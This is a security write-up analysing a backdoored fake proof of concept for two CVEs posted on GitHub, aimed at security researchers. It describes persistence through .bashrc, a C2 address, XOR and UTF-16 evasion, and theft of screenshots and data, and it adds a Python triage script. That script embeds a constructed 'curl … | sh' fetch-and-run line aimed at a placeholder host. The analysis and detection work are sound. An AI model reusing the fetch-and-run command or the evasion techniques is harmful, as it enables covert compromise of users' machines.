Background
CVE-2023-20871 is a vulnerability demonstrated by STAR Labs security researchers at the Pwn2Own Vancouver hacking competition. It is a stack-based buffer overflow in the Bluetooth virtual shared host device feature of VMware virtual machines.
CVE-2023-35829 is a use-after-free (UAF) vulnerability in the rkvdec_remove function of drivers/staging/media/rkvdec/rkvdec.c in Linux kernel versions prior to 6.3.2.
Event
On July 3, 2023, a user named ChriSanders22 on GitHub published the PoC of CVE-2023–35829 and CVE-2023–20871.
On July 4, 2023, Twitter user st0ic3r discovered that the PoC was fake and contained a backdoor.
As of July 11, 2023, the user has deleted the repository and account, but there are still other users uploading the same PoC.
Technical Analysis
There are many suspicious signs in the files of the CVE-2023-35829 PoC.
The first is the Makefile, whose line 17 executes a file at ./src/aclocal.m4.
Examining this file with file and strings reveals references to many Linux system calls such as getenv and getpid.
Reverse engineering the file with IDA shows that if the file name is not kworker, it copies itself to a file named kworker and then modifies .bashrc so that the copy runs the next time a Bash shell starts.
If the file name is kworker, it calls the exeCommandFromC2 function every 120 seconds, which fetches commands from the C2 server http[:]//cunniloss[.]accesscam[.]org/hash.php and recovers the plaintext commands by decrypting them with XOR 0x83.
The commands download a script that takes screenshots, adds SSH keys, and compresses user data together with the screenshots for upload to the C2 server.
Reactions
On July 4, 2023, security researchers discovered the fake PoC and raised an issue in the repo.
As of July 11, 2023, the ChriSanders22 account and the fake PoC repo have been deleted, but other users still host identical repos.
Lesson Learned
This event is a watering hole attack targeting security personnel. It uses fake PoCs whose Makefiles contain backdoors that run when researchers compile and execute them.
The fake PoC uses a new user namespace to map the current UID to UID 0 (root), so id and whoami show root in the new shell. The backdoor also encodes its C2 URLs in UTF-16 to evade strings and disassembly.
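Both evasion tricks described in this analysis (UTF-16 encoded URLs that plain strings misses, and command data XOR-ed with 0x83) can be surfaced during triage of a suspicious PoC binary. The following is an added example, not code from the original post or from the backdoor; the sample blob and the hostnames in it are constructed placeholders.

```python
import re

# Constructed sample "binary" that mimics the two tricks from the analysis:
# a C2 URL stored as UTF-16LE (every char followed by 0x00, so `strings` on
# its own does not show it) and a command blob XOR-ed with the byte 0x83.
# Hostnames are placeholders, not the real C2 from the post.
SAMPLE_BLOB = (
    b"\x7fELF\x00\x00plain-visible-string\x00\x00"
    + "http://c2-placeholder.invalid/hash.php".encode("utf-16-le")
    + b"\x00\x00\x00\x00"
    + bytes(c ^ 0x83 for c in b"curl -s http://c2-placeholder.invalid/s.sh | sh")
    + b"\x00"
)

# Runs of at least six printable ASCII bytes, the same idea as `strings -n 6`.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
_URL = re.compile(r"https?://[^\s'\"<>]+")


def find_utf16le_strings(data, min_len=6):
    """Return printable ASCII runs stored as UTF-16LE (char, 0x00, char, 0x00...)."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def xor_single_byte(data, key):
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def find_xor_strings(data, key, min_len=6):
    """Decode the whole blob with a single-byte XOR key and return printable runs.

    Genuine plaintext bytes (0x20-0x7e) XOR 0x83 all land above 0x7f, so only
    data that was XOR-encoded with that key shows up as readable text.
    """
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(xor_single_byte(data, key))]


def find_c2_indicators(data, key=0x83):
    """Collect URL-bearing strings hidden by either encoding, keyed by technique."""
    return {
        "utf16le": [s for s in find_utf16le_strings(data) if _URL.search(s)],
        "xor": [s for s in find_xor_strings(data, key) if _URL.search(s)],
    }


if __name__ == "__main__":
    for technique, hits in find_c2_indicators(SAMPLE_BLOB).items():
        for hit in hits:
            print(f"[{technique}] {hit}")
```

Running it on a real sample means reading the file bytes into the functions instead of SAMPLE_BLOB; unknown single-byte keys can be brute-forced by looping find_xor_strings over all 256 values.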
Watering hole attacks on security personnel are not rare: in June 2023, a fake PoC for Microsoft Exchange was used the same way.
In summary, security researchers should never trust public PoC code. Audit all code from GitHub or elsewhere for malice, especially exploits, or test unfamiliar code only in safe, isolated virtual environments.